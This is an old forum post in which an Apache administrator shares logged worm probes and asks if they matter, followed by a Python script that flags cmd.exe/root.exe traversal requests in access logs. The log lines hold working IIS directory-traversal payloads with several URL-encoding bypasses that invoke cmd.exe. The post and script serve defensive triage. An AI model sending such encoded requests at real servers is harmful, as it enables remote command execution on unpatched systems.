"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

Author: Guy Chouinard Jr
Date:  
Subject: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
I just noticed this on my Apache server log.

Is this anything I should be concerned about?

If I understand correctly what I've read, this is
a worm that exploits MS IIS vulnerabilities.


209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

209.74.14.140 - - [21/Jan/2002:09:39:02 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298




--
Guy Chouinard Jr
http://linuxbytes.net.dhis.org/index.php3
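
One way to triage requests like these in an Apache access log, as an added example that is not part of the original post: it counts the cmd.exe/root.exe probes per source address and lists any that were answered with a 2xx or 3xx status instead of the 404 and 400 seen above. The sample log is constructed from three of the posted lines plus one benign request, and the matching rules (file names and traversal after double URL decoding) are assumptions chosen to fit the requests shown.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample: three requests copied from the post plus one benign
# request from a documentation address (192.0.2.10).
SAMPLE = """\
209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
192.0.2.10 - - [21/Jan/2002:09:40:00 -0700] "GET /index.php3 HTTP/1.0" 200 5120
"""

# Apache common log format: host, ident, user, [time], "request", status, size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')


def is_probe(target):
    """True if the request path looks like the IIS probes in the post."""
    path = target.split("?", 1)[0]
    # Decode twice so double encodings such as %255c and %%35c become "\".
    decoded = unquote(unquote(path)).lower()
    names = decoded.endswith(("/cmd.exe", "/root.exe"))
    traversal = "../" in decoded or "..\\" in decoded
    return names or traversal


def summarize(log_text):
    """Per source address: probe count and any probe answered with 2xx/3xx."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        host, target, status = m.groups()
        if not is_probe(target):
            continue
        report[host]["probes"] += 1
        if status[0] in "23":  # the server returned content or a redirect
            report[host]["served"].append(target)
    return dict(report)


if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        verdict = "REVIEW" if info["served"] else "all rejected"
        print(f"{host}: {info['probes']} probes, {verdict}")
```

An empty "served" list means every probe from that address was rejected by the server; any entry in it is a request worth looking at by hand.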